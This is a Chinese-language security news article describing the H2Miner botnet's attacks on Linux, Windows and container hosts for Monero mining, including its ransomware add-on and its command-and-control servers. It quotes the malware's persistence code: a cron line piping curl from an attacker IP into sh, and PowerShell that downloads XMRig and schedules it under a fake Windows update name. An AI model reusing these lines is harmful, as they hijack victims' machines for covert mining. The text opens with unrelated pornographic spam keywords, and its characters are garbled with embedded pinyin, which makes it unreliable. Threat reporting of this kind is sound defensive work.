偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

H2Miner 僵尸網(wǎng)絡(luò)攻擊 Linux、Windows 及容器設(shè)備進(jìn)行門羅幣挖礦

安全
攻擊者通過組合云環(huán)境感知腳本、跨平臺(tái)編譯二進(jìn)制文件以及系統(tǒng)原生命令,能在防御者察覺CPU負(fù)載異常前快速建立門羅幣挖礦通道。

首次發(fā)現(xiàn)于2019年末的H2Miner僵尸網(wǎng)絡(luò)近期卷土重來,其攻擊手段已突破加密貨幣劫持與勒索軟件的界限。最新攻擊活動(dòng)利用廉價(jià)虛擬專用服務(wù)器(VPS)和多種常見惡意軟件,同時(shí)入侵Linux主機(jī)、Windows工作站和容器工作負(fù)載。

多平臺(tái)攻擊技術(shù)

攻擊者通過組合云環(huán)境感知腳本、跨平臺(tái)編譯二進(jìn)制文件以及系統(tǒng)原生命令,能在防御者察覺CPU負(fù)載異常前快速建立門羅幣挖礦通道。攻擊始于對(duì)配置錯(cuò)誤服務(wù)或漏洞應(yīng)用的利用,包括Apache ActiveMQ(CVE-2023-46604)和Log4Shell漏洞。

入侵成功后,僵尸網(wǎng)絡(luò)會(huì)部署定制化加載腳本——Linux系統(tǒng)使用ce.sh,Windows系統(tǒng)使用1.ps1——這些腳本會(huì)終止其他挖礦進(jìn)程、禁用終端防護(hù),并從78.153.140.66下載XMRig挖礦程序。容器環(huán)境同樣遭受攻擊:spr.sh腳本會(huì)掃描Docker鏡像并移除阿里云的aegis防護(hù)代理,隨后植入Kinsing惡意軟件。

復(fù)合型攻擊基礎(chǔ)設(shè)施

同一攻擊基礎(chǔ)設(shè)施還托管著位于47.97.113.36的Cobalt Strike團(tuán)隊(duì)服務(wù)器,以及偽裝成"MicrosoftSoftware.exe"的Bitbucket代碼倉庫,顯示出成熟的多層命令與控制(C2)架構(gòu)。Fortinet分析師發(fā)現(xiàn),新型VBScript勒索軟件Lcrypt0rx已與挖礦程序捆綁傳播。

雖然其加密算法較為簡單——采用8,192字符的XOR密鑰結(jié)合文件專屬鹽值——但該腳本仍會(huì)覆寫主引導(dǎo)記錄(MBR),并在系統(tǒng)中散布偽裝持久化鉤子。

錢包地址與托管服務(wù)器的重疊表明,當(dāng)前攻擊者可能與H2Miner原始團(tuán)隊(duì)存在協(xié)作或從屬關(guān)系。

持久化機(jī)制剖析

H2Miner通過分層感染鏈實(shí)現(xiàn)持久化。初始腳本會(huì)枚舉防御進(jìn)程,使用暴力正則表達(dá)式終止這些進(jìn)程,并通過清除命令歷史來抹除攻擊痕跡。

Linux系統(tǒng)中,ce.sh會(huì)植入每10分鐘自我重下載的cron計(jì)劃任務(wù):

( crontab -l 2>/dev/null ; \
 echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -

Windows系統(tǒng)則通過1.ps1腳本將XMRig注冊(cè)為計(jì)劃任務(wù):

$miner = "$env:TEMP\sysupdate.exe"
Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner
schtasks /create /f /tn "Update service for Windows Service" `
     /tr "$miner" /sc minute /mo 15 /rl highest

復(fù)合防御策略需求

在Windows平臺(tái),Lcrypt0rx通過Shell.Application提權(quán)后,會(huì)嘗試修改Winlogon Shell和映像劫持(IFEO)注冊(cè)表鍵實(shí)現(xiàn)持久化。雖然注冊(cè)表邏輯存在缺陷,但惡意軟件通過部署6個(gè)輔助腳本(從循環(huán)執(zhí)行殺毒軟件終止的advapi32_ext.vbs,到基礎(chǔ)自傳播腳本USB_bridge.vbs)確保存活。

這些輔助腳本均以隱藏系統(tǒng)文件屬性(+h +s +r)投放,并通過注冊(cè)表自啟動(dòng)項(xiàng)調(diào)用。配合cpr.sh等頻繁更新的腳本,即使部分組件被清除,僵尸網(wǎng)絡(luò)仍能重建挖礦通道。防御者需全面清理容器鏡像、計(jì)劃任務(wù)、cron條目和異常注冊(cè)表鍵,否則門羅幣錢包(如4ASk4RhU...p8SahC)將在警報(bào)解除后持續(xù)竊取計(jì)算資源。

責(zé)任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2021-01-04 13:23:56

僵尸網(wǎng)絡(luò)加密貨幣漏洞

2021-04-26 23:27:41

僵尸網(wǎng)絡(luò)漏洞惡意代碼

2025-06-23 09:58:52

2021-01-07 10:41:42

GolangWindowsLinux

2021-07-08 15:48:51

僵尸網(wǎng)絡(luò)IoTDDoS攻擊

2021-12-23 14:05:31

態(tài)勢(shì)感知/挖礦木馬

2022-05-16 13:37:12

Sysrv僵尸網(wǎng)絡(luò)微軟

2025-05-29 09:29:32

2021-11-19 14:33:27

挖礦木馬病毒

2021-08-10 10:37:43

惡意軟件挖礦網(wǎng)絡(luò)攻擊

2021-01-19 14:57:47

AI

2021-02-19 09:23:37

僵尸網(wǎng)絡(luò)DDoS攻擊安卓設(shè)備

2025-02-07 15:03:08

2017-02-09 13:23:46

2020-06-19 16:02:03

物聯(lián)網(wǎng)僵尸網(wǎng)絡(luò)DDoS攻擊

2015-10-09 10:25:51

2010-05-21 15:10:27

2021-12-13 11:51:14

區(qū)塊鏈Glupteba僵尸網(wǎng)絡(luò)

2010-08-31 13:05:25

2021-01-20 23:48:57

FreakOut僵尸網(wǎng)絡(luò)漏洞
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)